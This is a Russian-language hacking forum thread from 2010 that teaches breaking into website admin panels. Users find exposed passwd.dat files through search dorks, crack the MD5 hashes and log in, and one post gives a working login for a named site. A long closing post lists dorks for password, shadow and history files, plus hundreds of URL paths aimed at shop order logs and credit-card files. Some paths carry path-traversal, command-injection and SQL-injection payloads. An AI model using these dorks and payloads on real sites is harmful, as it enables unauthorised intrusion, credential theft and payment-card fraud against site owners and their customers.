Ломаем сайты попадавшиеся нам на встречу)))

baks1 · 01.01.2010, 22:38

Заходим в любой поисковик и вводим: [Ссылки могут видеть только зарегистрированные пользователи. ]
Находим сайты... Там нам дают логин, но пасс зашифрован, тыкаем [Ссылки могут видеть только зарегистрированные пользователи. ], и вводим туда эту надпись)) Всё, у нас есть пароль и логин от админки этого сайта))
Источник: [Ссылки могут видеть только зарегистрированные пользователи. ]

y4en · 02.01.2010, 02:36

бред. сам пробовал.. я опробовал на 5 сайтах неработает

baks1 · 03.01.2010, 21:37

Цитата:

Сообщение от y4en


	бред. сам пробовал.. я опробовал на 5 сайтах неработает

А я пробовал и работает, самое главное найти админку...
alexde/alexde логин/пасс от [Ссылки могут видеть только зарегистрированные пользователи. ]
А вот теперь я уж точно заслужил спасибку от тебя))

~~maxxx~~ · 03.01.2010, 21:43

Знал про это аж с 2007 года! оО

**object** · 04.01.2010, 18:06

Пробовал нефига)

Вот более описанно ...))

Всем привет!
И сейчас я вам расскажу как взломать админку за 3 минуты.
Идём на [Ссылки могут видеть только зарегистрированные пользователи. ]
В поиск вводим

filetype

at passwd

Жмём Enter и вы увидите много сайтов.... (все эти сайты будут php)
Входим на любой

Там написана вот такая вот фенька ....
Пример:

<?php
$Password['volhnano'] = "d66d8ece95359c86733ec559f2335614";
?>

Пример :

volhnano=это логин
d66d8ece95359c86733ec559f2335614 это пароль в зашифрованном виде ... md5

Теперь идём вот сюды [Ссылки могут видеть только зарегистрированные пользователи. ] (Расшифровка)

И пишем туда наш зашифрованный пасс ....
Пример:
d66d8ece95359c86733ec559f2335614

потом входишь на главную страницу сайта (ну где эти три строки) убираешь из браузера passwd.dat,жмёшь Enter,входишь в Admin,вводишь логин и пароль)

Теперь круши,и наслаждаемся ...
Удачи ...

копипаст)) нашол пока искал)

Добавлено через 4 минуты
Действительно пашет но зайти не как =\

~~~ВаняБелый~~~ · 05.01.2010, 03:13

Старо как мир! но всеже находится редко сайты с такими дырами.

kollini · 10.01.2010, 14:25

как можно взломать так сетивой сайт?

dager315 · 18.01.2010, 05:40

PHP код:


			
четверг, 12 апреля 2007 г.

allintitle: sensitive filetype:doc

-==[Password Hacking.]





filetype:htpasswd htpasswd

intitle:"Index of .htpasswd -intitle:"dist -apache -htpasswd.c

index.of.private (algo privado)

intitle:index.of master.passwd

inurl:passlist.txt (para encontrar listas de passwords)

intitle:"Index of..etc passwd

intitle:admin intitle:login

Incorrect syntax near (SQL script error)

intitle:"the page cannot be found inetmgr (debilidad en IIS4)

intitle:index.of ws_ftp.ini

Supplied arguments is not a valid PostgreSQL result (possible debilidad SQL)

_vti_pvt password intitle:index.of (Frontpage)

inurl:backup intitle:index.of inurl:admin

Index of /backup

index.of.password

index.of.winnt



inurl:"auth_user_file.txt

Index of /admin

Index of /password

Index of /mail

Index of / +passwd

Index of / +.htaccess

Index of ftp +.mdb allinurl:/cgi-bin/ +mailto

allintitle: index of/admin

allintitle: index of/root

allintitle: sensitive filetype:doc

allintitle: restricted filetype :mail

allintitle: restricted filetype:doc site:gov

administrator.pwd.index

authors.pwd.index

service.pwd.index

filetype:config web

gobal.asax index

inurl:passwd filetype:txt

inurl:admin filetype:db

inurl:iisadmin

inurl:"auth_user_file.txt

inurl:"wwwroot/*.

allinurl: winnt/system32/ (get cmd.exe)

allinurl:/bash_history

intitle:"Index of .sh_history

intitle:"Index of .bash_history

intitle:"Index of passwd

intitle:"Index of people.1st

intitle:"Index of pwd.db

intitle:"Index of etc/shadow

intitle:"Index of spwd

intitle:"Index of master.passwd

intitle:"Index of htpasswd

intitle:"Index of members OR accounts

intitle:"Index of user_carts OR user _cart







--------------------------------------------------------------------------------



-==[Hackers Favourite Keywords in google.]



"Index of /admin"

"Index of /password"

"Index of /mail"

"Index of /" +passwd

"Index of /" +password.txt

"Index of /" +.htaccess

index of ftp +.mdb allinurl:/cgi-bin/ +mailto



administrators.pwd.index

authors.pwd.index

service.pwd.index

filetype:config web

gobal.asax index



allintitle: "index of/admin"

allintitle: "index of/root"

allintitle: sensitive filetype:doc

allintitle: restricted filetype :mail

allintitle: restricted filetype:doc site:gov



inurlasswd filetype:txt

inurl:admin filetype:db

inurl:iisadmin

inurl:"auth_user_file.txt"

inurl:"wwwroot/*."





top secret site:mil

confidential site:mil



allinurl: winnt/system32/ (get cmd.exe)

allinurl:/bash_history



intitle:"Index of" .sh_history

intitle:"Index of" .bash_history

intitle:"index of" passwd

intitle:"index of" people.lst

intitle:"index of" pwd.db

intitle:"index of" etc/shadow

intitle:"index of" spwd

intitle:"index of" master.passwd

intitle:"index of" htpasswd

intitle:"index of" members OR accounts

intitle:"index of" user_carts OR user_cart



ALTERNATIVE INPUTS====================



_vti_inf.html

service.pwd

users.pwd

authors.pwd

administrators.pwd

shtml.dll

shtml.exe

fpcount.exe

default.asp

showcode.asp

sendmail.cfm

getFile.cfm

imagemap.exe

test.bat

msadcs.dll

htimage.exe

counter.exe

browser.inc

hello.bat

default.asp\

dvwssr.dll

cart32.exe

add.exe

index.jsp

SessionServlet

shtml.dll

index.cfm

page.cfm

shtml.exe

web_store.cgi

shop.cgi

upload.asp

default.asp

pbserver.dll

phf

test-cgi

finger

Count.cgi

jj

php.cgi

php

nph-test-cgi

handler

webdist.cgi

webgais

websendmail

faxsurvey

htmlscript

perl.exe

wwwboard.pl

www-sql

view-source

campas

aglimpse

glimpse

man.sh

AT-admin.cgi

AT-generate.cgi

filemail.pl

maillist.pl

info2www

files.pl

bnbform.cgi

survey.cgi

classifieds.cgi

wrap

cgiwrap

edit.pl

perl

names.nsf

webgais

dumpenv.pl

test.cgi

submit.cgi

guestbook.cgi

guestbook.pl

cachemgr.cgi

responder.cgi

perlshop.cgi

query

w3-msql

plusmail

htsearch

infosrch.cgi

publisher

ultraboard.cgi

db.cgi

formmail.cgi

allmanage.pl

ssi

adpassword.txt

redirect.cgi

cvsweb.cgi

login.jsp

dbconnect.inc

admin

htgrep

wais.pl

amadmin.pl

subscribe.pl

news.cgi

auctionweaver.pl

.htpasswd

acid_main.php

access.log

log.htm

log.html

log.txt

logfile

logfile.htm

logfile.html

logfile.txt

logger.html

stat.htm

stats.htm

stats.html

stats.txt

webaccess.htm

wwwstats.html

source.asp

perl

mailto.cgi

YaBB.pl

mailform.pl

cached_feed.cgi

global.cgi

Search.pl

build.cgi

common.php

show

global.inc

ad.cgi

WSFTP.LOG

index.html~

index.php~

index.html.bak

index.php.bak

print.cgi

register.cgi

webdriver

bbs_forum.cgi

mysql.class

sendmail.inc

CrazyWWWBoard.cgi

search.pl

way-board.cgi

webpage.cgi

pwd.dat

adcycle

post-query

help.cgi



/robots.txt

/admin.mdb

/shopping.mdb

/arg;

/stats/styles.css

/statshelp.htm

/favicon.ico

/stats/admin.mdb

/shopdbtest.asp

/cgi-bin/test.cgi

/cgi-bin/test.pl

/cgi-bin/env.cgi

/photos/protest/styles.css

[url]http://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi[/url]

/cgi-bin/whereami.cgi

/shopping400.mdb

/cgi/test.cgi

/cgi-bin/test2.pl

/photos/protest/kingmarch_02.html

/chevy/index.htm

/cgi-bin/glocation.cgi

/cgi-bin/test2.cgi

/ccbill/glocation.cgi

/cgi-bin/styles.css

/shopping350.mdb

/cgi-bin/shopper.cgi

/shopadmin.asp

/news_2003-02-27.htm

/cgi-bin/whois.cgi

3 /cgi-bin/calendar.pl

3 /cgi-bin/calendar/calendar.pl

3 /cgibin/styles.css

3 /venem.htm

2 /stats/www.newbauersflowers.com/stats/04-refers.htm

2 /cgi-bin/where.pl

2 /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG

2 /cgibin/recon.cgi

2 /cgibin/test.cgi

2 /WebShop/templates/styles.css

2 /stats/shopping350.mdb

2 /cgi-bin/mailform.cgi

2 /cgi-bin/recon.cgi

2 /chevy

2 /cgi-bin/servinfo.cgi

2 /acart2_0.mdb

2 /cgi-bin/where.cgi

2 /chevy/

2 /stats/www.savethemall.net/stats/19-refers.htm

2 /ccbill/secure/ccbill.log

2 /cgi/recon.cgi

2 /stats/www.gregoryflynn.com/chevy

2 /ibill/glocation.cgi

2 /ccbill/whereami.cgi

2 /ibill/whereami.cgi

2 /apps_trial.htm

2 /cgi-bin/lancelot/recon.cgi

2 /cgi-bin/DCShop/Orders/styles.css

1 /cgi-bin/htmanage.cgi

1 /stats/www.tysons.net/stats/05-refers.htm

1 /cgi-bin/mastergate/add.cgi

1 /cgi-bin/openjournal.cgi

1 /cgi-bin/calendar/calendar_admin.pl

1 /cgibin/ibill/count.cgi

1 /cgi-bin/nbmember2.cgi

1 /cgi-bin/mastergate/count.cgi

1 /cgi-bin/mastergate/accountcreate.cgi

1 /cgi-bin/ibill/accountcreate.cgi

1 /cgibin/MasterGate2/count.cgi

1 /cgi-bin/amadmin.pl

1 /cgibin/mailform.cgi

1 /cgibin/mastergate/count.cgi

1 /cgibin/harvestor.cgi

1 /cgibin/igate/count.cgi

1 /WebShop

1 /shopdisplaycategories.asp

1 /cgi-bin/DCShop/Orders/orders.txt

1 /cgi-bill/revshare/joinpage.cgi

1 /stats/www.gregoryflynn.com/stats/19-refers.htm

1 /cgi-local/DCShop/auth_data/styles.css

1 /cgi-bin/add-passwd.cgi

1 /cgi-bin/MasterGate/count.cgi

1 /apps_shop.htm%20/comersus/database/comersus.mdb

1 /data/verotellog.txt

1 /epwd/ws_ftp.log

1 /stats/www.dialacure.com/stats/16-refers.htm

1 /cgi/MasterGate2/count.cgi

1 /jump/rsn.tmus/skybox;sz=140x150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019

1 /wwii/styles.css

1 /cgi-bin/admin.mdb

1 /stats/www.gregoryflynn.com/stats/31-refers.htm

1 /cgi-bin/ibill-tools/count.cgi

1 /WebShop/templates/cc.txt

1 /cgibin/ibill/accountcreate.cgi

1 /cgi-bin/count.cgi

1 /cgi-local/DCShop/auth_data/auth_user_file.txt

1 /cgi/mastergate/count.cgi

1 /cgi-bin/EuroDebit/addusr.pl

1 /cgi-bin/dbm-passwd.cgi

1 /cgi/igate/accountcreate.cgi

1 /cgi-bin/store/Log_files/your_order.log

store/log_files/your_order.log

/cg i-bin/DCShop/Orders/orders.txt

/vpasp/shopdbtest.asp

/orders/checks.txt

/WebShop/logs

/ccbill/secure/ccbill.log

/scripts/cart32.exe

/ cvv2.txt

/cart/shopdbtest.asp

/cgi-win/cart.pl

/shopdbtest.asp

/WebShop/logs/cc.txt

/cgi-local/cart.pl

/PDG_Cart/order.log

/config/---.mdb

/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html

/or ders/orders.txt

/cgis/cart.pl

/webcart/carts

/cgi-bin/cart32.exe/cart32clientlist

/cgi/cart.pl

/comersus/database/comersus.mdb

/WebShop/temp lates/cc.txt

/Admin_files/order.log

/orders/mountain.cfg

/cgi-sys/cart.pl

/scripts/cart.pl

/htbin/cart.pl

/productcart/database/EIPC.mdb

/shoponline/fpdb/shop.mdb

/config/datasources/myorder.mdb

/PDG_Cart/shopper.conf

/shopping/database/metacart.mdb

/bin/cart.pl

/cgi-bin/cart32.ini

/database/comersus.mdb

/cgi-local/medstore/loadpage.cgi?user_id= id&file=data/orders.txt

/cgi-bin/store/Admin_files/myorderlog.txt

/cgi-bin/orders.txt

/cgi-bin/store/Admin_files/your_order.log

/test/test.txt

/fpdb/shop.mdb

/cgibin/shop/orders/orders.txt

/shopadmin1.asp

/cgi-bin/shop.cgi

/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi

/cgi-bin/PDG_cart/card.txt

/shopper.cgi?preadd=action&key=PROFA&template=order1.log

/store/shopdbtest.asp

/log_files/yo ur_order.log

/_database/expire.mdb

/HyperStat/stat_what.log

/cgi bin/DCShop/auth_data/auth_user_file.txt

/htbin/orders/orders.txt

/SHOP/shopadmin.asp

/index.cgi?page=../admin/files/order.log

/vpshop/shopadmin.asp

/webcart/config

/PDG/order.txt

/cgi-bin/shopper.cgi

/orders/order.log

/orders/db/zzzbizorders.log.html

/easylog/easylog.html

/cgi-bin/store/Log_files/your_order.log

/cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb

/comersus_message.asp?

/orders/import.txt

/htbin/DCShop/auth_data/auth_user_file.txt

/admin /html_lib.pl

/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt

/cgi-bin/DCShop/auth_data/auth_user_file.txt

/cgi-bin /shop.pl/page=;cat%20shop.pl

/cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log

/HBill/htpasswd

/bin/shop/auth_data/auth_user_file.txt

/cgi-bin /cs/shopdbtest.asp

/mysql/shopping.mdb

/Catalog/config/datasources/Products.mdb

/trafficlog

/cgi/orders/orders.txt

/cgi-local/PDG_Cart/shopper.conf

/store/cgi-bin/---.mdb

/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log

/derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log

/cgi-bin/mc.txt

/cgi-bin/mall2000.cgi

/cgi-win /DCShop/auth_data/auth_user_file.txt

/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log

/store/commerce.cgi

/scripts/ shop/orders/orders.txt

/product/shopping350.mdb

/super_stats/access_logs

/cgi-local/orders/orders.txt

/ cgi-bin/PDG_Cart/mc.txt

/cgibin/cart32.exe

/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log

/cgibin/password.txt

/Catalog/cart/carttrial.dat

/catalog/Admin /Admin.asp

/ecommerce/admin/user/admin.asp

/data/productcart/database/EIPC.mdb

/store/admin_files/commerce_user_lib.pl

/cgi-bin/store/index.cgi

/paynet.txt

/config/datasources/store/billing.mdb

/_database/shopping350.mdb

/cgi-bin/shopper.exe?search

/cgi/shop.pl/page=;cat%20shop.pl

/cgi-bin /store/Admin_files/orders.txt

/cgi-bin/store/commerce_user_lib.pl

/cgi-sys/pagelog.cgi

/cgi-sys/shop.pl/ page=;cat%20shop.pl

/scripts/weblog

/fpdb/shopping400.mdb

/htbin/shop/orders/orders.txt

/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log

/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log

/mall_log_files/

/cgi-bin/perlshop.cgi

/tienda/shopdbtest.asp

/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb

/cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log

/WebShop/logs/ck.log

/fpdb/shopping300.mdb

/mysql/store.mdb

/cgi-bin/store/Admin_files/commerce_user_lib.pl

/config.dat

/order/order.log

/commerce_user_lib.pl

/Admin_files/AuthorizeNet_user_lib.pl

/cvv2.asp

/cgi-bin/cart32/CART32-order.txt

/wwwlog

/cool-logs/mlog.html

/cgi-bin /pass/merchant.cgi.log

/cgi-local/pagelog.cgi

/cgi-bin/pagelog.cgi

/cgi-bin/orders/cc.txt

/cgis/shop/orders/orders.txt

/admin /admin_conf.pl

/cgi-bin/pdg_cart/order.log

/cgi/PDG_Cart/order.log

/Admin_files/ccelog.txt

/cgi-bin/orders/mc.txt

/cgi/cart32.exe

/ecommerce/admin /admin.asp

/scripts/DCShop/auth_data/auth_user_file.txt

/Catalog/config/---.mdb

/ecommerce/admin/shopdbtest.asp

/mysql/mystore.mdb

/cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp

/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

/cgi-bin/Count.cgi?df=callcard.dat

/logfiles/

/shopping/shopping350.mdb

/admin/configuration.pl

/cgis/DCShop/auth_data/auth_user_file.txt

/cgis/cart32.exe

/ cgi-bin/dcshop.cgi

/cgi-win/shop/auth_data/auth_user_file.txt

/shopping400.mdb

/HBill/config

/cgi-bin/shop/index.cgi?page=../admin/files/order.log

/search=action&keywords=GSD%20&template=order.log

/WebCart/orders.txt

/PDG_Cart/ authorizenets.txt

/cgi-bin/AnyForm2

/~gcw/cgi-bin/Count.cgi?df=callcard.dat

/cgi-bin/PDG_Cart/order.log

/expire.mdb

/logger/

/webcart-lite/orders/im port.txt

/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl

/cgi-bin/PDG_Cart/shopper.conf

/cgi-bin/cart32.exe

/dc/orders/orders.txt

/cgi-local/DCShop/orders/orders. txt

/shop.pl/page=shop.cfg

/cgi-local/cart32.exe

/cgi-win/pagelog.cgi

/cgi-win /shop/orders/orders.txt

/cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv

/cgi-sys/DCShop/auth_data/auth_user_file.txt

/ cgi-bin/www-sql;;;

/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log

/scripts/orders/orders.txt

/cgi-loca l/shop.pl/shop.cfg

/search=action&keywords=cwtb%20&template=expire.mdb

/php/mylog.phtml

/config/datasources/shopping.mdb

/php-coolfile/action.php?action=edit&file=config.php

/cgi-bin/ezmall2000/mall2000.cgi

/cgi/DCShop/orders/orders.txt

/cgi-local/ shop.pl

/cgis/DCShop/orders/orders.txt

/product/shopdbtest.asp

/ ASP/cart/database/metacart.mdb

/cgi-bin/cgi-lib.pl

/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html

/search=action&keywords=cwtb%20&template=order.log

/mysql/expire.mdb

/scripts/sh op/auth_data/auth_user_file.txt

/cgi-bin/cart32/whatever-OUTPUT.txt

/Shopping%20Cart/shopdbtest.asp

/cgi/shop/auth_data/auth_user_file.txt

/sh op/shopping350.mdb

/cgi-bin/store/Authorize_Net.pl

/scripts/DCShop/orders/orders.txt

/store/l og_files/commerce_user_lib.pl

/shopping/shopadmin.asp

/cgi-bin/orderlog.txt

/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CO DE=PHOLD;;;

/cool-logs/mylog.html

/cgibin/shop.pl/page=;cat%20shop.pl

/htbin /shop.pl/page=;cat%20shop.pl

/cgi-win/orders/orders.txt

/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt

/SHOP/shopdbtest.asp

/cgi/pagelog.c gi

/php/mlog.phtml

/cgi-bin/shop/apdproducts.mdb

/htbin/shop/auth_data/auth_user_file.txt

/server%20logfile;;;

/database/ metacart.mdb

/cgi-local/shop/orders/orders.txt

/dcshop/auth_data/auth_user_file.txt

/log/

/cgi-bin/shop.cgi/page=../../../../etc/hosts

/scripts/c32web.exe

/cgis/ord ers/orders.txt

/logfile/

/shop_db/shopping.mdb

/shopping.mdb

/weblog/

/config/datasources/cvv2.mdb

/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin /PDG_Cart/order.log

/cgi-sys/shop/orders/orders.txt

/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.log

/cgi-win/cart32.exe

/cgi-bin/loadpage.cgi

/dcshop/orders/orders.txt

/shop/show.php?q='

/cgib in/orders/orders.txt

/bin/pagelog.cgi

/cgi-bin/shop/orders/orders.txt

/_database/shopdbtest.asp

/cgibin /pagelog.cgi

/cgi-local/shop.pl/page=;cat%20shop.pl

/shop/search .php?q='

/cgi-sys/cart32.exe

/order13.txt

/weblogs/

/orderb/sh op.mdb

/config/datasources/order.mdb

/store/cgi-bin/Admin_files/Store_user_lib.pl

/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC

/Orders /order.log

/logs/access_log

/config/datasources/your_order.mdb

/ecommerce/admin/admin/admin.asp

/mall_log_files/order.log

/bin/cart32.exe

/htbin/DCShop/orders/orders.txt

/Admin_files/Authorize_Net.pl

/logging/

/database/

/cgi-sys/shop/auth_data/auth_user_file.txt

/bin/shop.pl/page=;cat%20shop.pl

/cgi-local/shop/auth_data/auth_user_fil e.txt

/cgi-local/DCShop/auth_data/auth_user_file.txt

/cgi-bin/shop/auth_data/auth_user_file.txt

/cgi-win /DCShop/orders/orders.txt

/store/Admin_files/Authorize_Net.pl

/cart/cart.asp

/bin/DCShop/orders/orders.txt

/scripts/pagelog.cgi

/cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=expire.mdb

/webcart/config/clients.txt

/dc/auth_data/auth_user_file.txt

/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log

/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt

/bin /orders/orders.txt

/cgi-bin/Web_Store/web_store.cgi

/cgis/pagelog.cgi

/cgi-bin /orders/orders.txt

/merchant/shopdbtest.asp

/cgi-local/shop.pl/page=shop.cfg

/cgis/shop.pl/pa ge=;cat%20shop.pl

/index.cgi?%20pagine%20=%20../../../../../../../../etc/passwd

/cg-bin/

/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG

/cgi-bin /DCShop/Auth_data/auth_user_file.txt

/ecommerce/admin/adminLeft/admin.asp

/webcart/orders/import.txt

/cgibin/shop/auth_data/auth_user_file.txt

/productcart/database/eipc.mdb

/mysql/cheersoundchdb.mdb

/cgi-bin/order.txt

/scripts/iisadmin/tools/mkilog.exe

/ProductCart/database/EIPC.mdb

/databases/

/cg i-sys/orders/orders.txt

/cgi/DCShop/auth_data/auth_user_file.txt

/ database/EIPC.mdb

//cgi-bin/orders.txt

/vpasp-shopcart/shopdbtest.asp

/cgi-bin /shopper.exe?preadd=action&key=bajk390ss&template=order.log

/cgi-bin/DCShop/orders/orders.txt

/mysql/shopping350.mdb

/_database/shopping.mdb

/htbin/cart32.exe

/PDG_Cart/shopper.config

/cgis/shop/auth_data/auth_user_file.txt

/shop/SHOPDBTEST.ASP

/bin/shop/orders/orders.txt

//cgi-local/medstore/loadpage.cgi?user_id=id &file=data/orders.txt

/cgi-bin/store/dcshop_admin.cgi

/_database/shopping400.mdb

/scripts/shop.pl/page=;cat%20shop.pl

/cgibin/PDG_Cart/shopper.conf

/cgibin/DCShop/orders/orders.txt

/cgibin/%20awstats.pl?output=keywords

/cgi/shop/orders/orders.txt

/cgi-bin /cart32_old.exe

/webshop/templates/cc.txt

/webcart/orders

/pro ductcart/database/shop.mdb

/index.php?link=order

/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd

/shopping/shopdisplayproducts.asp?

/ccbill-local.cgi

/bin/DCShop/auth_data/auth_user_file.txt

/cgi-bin /c32web.exe/CheckError?error=53

/server/admin_files/commerce_user_lib.pl

/shopping/shopdisplayproducts.asp?id=1&cat=order.log

/mail.cgi

/cgibin/admin_files/

/cgi-bin/mail/form.cgi

/cgibin/shopping/database/metacart.mdb

/globill/ver12otellog.txt

/cgi-bin/shopping.mdb

/shopping%20.mdb

/cgi-bin/mail.cgi

/cgi-bin/FORM.cgi

/cgibin/shop/database/metacart.mdb

/mail/form.cgi

/cgibin /shop/shopping350.mdb

/form.cgi

/shopping/cgi-bin/cart32.ini

/index.cgi?page=../../../../../../../../etc/passwd

/cgi-bin/c32web.exe/ShowProgress

/vpasp/shopdisplayproducts.asp?cat=qwerty'% 20union%20select%20fldauto

/cgibin/orders.txt

/cgibin/scripts/shop/shopping350.mdb

/form/mail.cgi

/cgi-bin/store1b/index.cgi?page=../../../../../../../../etc/passwd

/webshop/logs/cc.txt

/form/form.cgi

/store/index.cgi?page=../../../../../../../../etc/passwd

/cgibin/awstats.pl%3Flang%3Dit%26output%3Durldetail

/cgibin/%20awstats.pl?

/cgi-bin/Form.cgi

/vpasp/shopdisplayproducts.asp?cat=admin'%20and%20fldpassword%0li%20ke%20'a%25

/admin.mdb

/cgi-bin/cart32.exe/error

/cgi/mail.cgi

/cgi-bin/c32web.exe/ShowAdminDir

/cgi-bin/csql/index.cgi?page=../admin/files/order.log

/cgi-bin/admin_files/

/cgi-bin/csql/index.cgi?page=../../../../../../../../etc/passwd

/admins.asp

/cgi-bin/cart_top

/cgi-bin/mail/mail.cgi

/shopadmin.asp

/cgi-bin/order.log

/mailform.pl

/cgibin/admin.pl

/vpasp/shopdisplayproducts.asp?

/policies1.htm

/cgi-bin/c32web_old.exe

/cgi-bin /c32web.exe

/cgi-bin/form/form.cgi

/cgibin/metacart.mdb

/shopdisplayproducts.asp

/cgi-sys/DCShop/orders/orde rs.txt

/ccbill6/secure/

/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=3124 &STRMVER=4&CAPREQ=0

/cgi-bin/ibill.log

/ccbill6/

/password.txt

/cgi-bin /PDG_cart/card

/cgibin/www.google.com

/honeymoonhideaway.htm+honeymoon+charleston

/cgibin/awstats.pl%3Flang%3Dnl

/cgibin/admin.pl?setpasswd

/cgibin/awstats.pl%3Fyear%3D2003%26month%3D07

/cgibin/awstats.pl%3Fyear%3D2003%26month%3D08

/cgibin/awstats.pl%3Fyear%3D2003%26month%3D09

/cgibin/%20awstats.pl?output=keywords

/shop/shopping450.mdb

/ccbill6/secure/ccbill.log

/cgibin/awstats.pl%3Flang%3Des%26update%3D1

/cgibin/shopper.cgi?search=action&keywords=ccpower%20&template=shopper.conf

/cgi-bin/form.cgi

/M83A

/cgibin/awstats.pl%3Fyear%3D2003%26month%3D11

/cgibin/amadmin.pl?setpasswd

/cgi-bin/awstats.pl%3Flang%3Dit

/orderdb/database/eipc.mdb

/cg-bin//eshop/database/order.mdb

/store/database/comersus.mdb

/cgibin /password.mdb

/~admin/guestbook

/cgibin/%20awstats.pl?%20cgibin/%20awstats.pl?output=keywords

/cgibin /awstats.pl%3Foutput%3Durldetail%26lang%3Dnl

/cgibin/%20awstats.pl?output=keywords

/sumthin

/cgibin/cgibin/%20awstats.pl?output=keywords

/cgi-bin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf

/cgibin/productcart/database/eipc.mdb

/cgibin/awstats.pl%3Flang%3Den%26output%3Durldetail

/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dit

/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dde

/mail/mail.cgi

/cgibin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf

/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dnl

/cg/.%20/comersus/database/comersus.mdb

/index%20of%20/%20productcart/database/eipc.mdb

/scripts/nsiislog.dll

/cgibin/order.cgi

/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0

/cgi-bin /awstats.pl%3Flang%3Dde

/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0

/cgibinserver/admin_files/commerce_user_lib.pl

/cgibin/store/Admin_files/myorderlog.txt

//cgibin/orders.txt

/cgibin/database/shopping.mdb

/cgibin/shopping/shopadmin.asp

/cgi-bin/shopper.cgi?preadd=action&key=PROFA&template=order1.log

/cgibin/shopper.exe?search=action&keywords=psiber&template=order.log

/cgibin/allmanageup.pl

/cgi-win/shop.pl/page=;cat%20shop.pl

/eshop/database/log.mdb

/cgibin /awsta

/cgibin/nph-proxy.pl

/cgibin/awstats.pl%3Flang%3Dnl%26update%3D1

//config/---.mdb

/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Den

/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Des

/cgibin/ccbill/password/.htpasswd

/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D08

/cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeyphrases

/eshop/en/database/credit.mdb

/cgi-bin /pdg_cart/shopper.conf

/password.mdb

/data/verotellog.txt

/cgibin/awstats.pl%3Foutput%3Durldetail%26update%3D1

/productcart/eipc.mdb

/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D11

/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dit

/index%20of%20/webshop/templates/cc.txt

/cartdb/database/eipc.mdb

/cg i-bin/eshop/database/order.mdb

/cgibin//fpdb/shopping400.mdb

/cgibin/order.txt

/cgi-bin/cart32.exe/expdate%20algunas%20veces

/cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeywords

/cgibin/database/comersus.mdb

/cgi-bin/awstats.pl%3Flang%3Des

/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dfr

/globill/

/cgibin/fpdb/shopping400.mdb

/cgibin/perl.exe

/eshop/en/database/log.mdb

/cgibin/shopper.exe?search=action&keywords=psiber&template=orders.log

/cg/comersus/database/comersus. mdb

/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D07

/cgibin/awstats.pl%3Flang%3Dnl%26output%3Durldetail

/cgibin/admin.mdb

/cgi-bin/whereami.cgi?g=ls

/cgibin/xxxhu

cgibin/cartserver/admin_files/commerce_user_lib.pl

/cgibin/%20awstats.pl?output=keywords

/cgibin /awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dfr

/robot.txt

/cgi-bin/form/mail.cgi

/ibill/mypins/

/cgi-bin/awstats.pl%3Flang%3Dnl

/cgibin/allmanage_admin.pl

/cgibin/%20awstats.pl?cgibin/%20awstats.pl?output=keywords

/cg-ibin /admin_files/

/cgibin/cart/comersus.mdb

/cg-bin/eshop/database/order.mdb

/cgibin /htt

/cgibin/phf

/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Den

/database/eipc.mdb

/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STR MVER=4&CAPREQ=0

/script/shop/shopping350.mdb

/cgibin/shopping350.mdb

/cg-bin/eshop/en/database/credit.mdb

/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Den

/cgi-bin/add-passwd.cgi

/logs/200306/charleston.com/

/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|

/cgibin/store/log_files/your_order.log

/cgibin /shopper.exe?search=action&keywords=psiber&template=neworder.log

/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D09

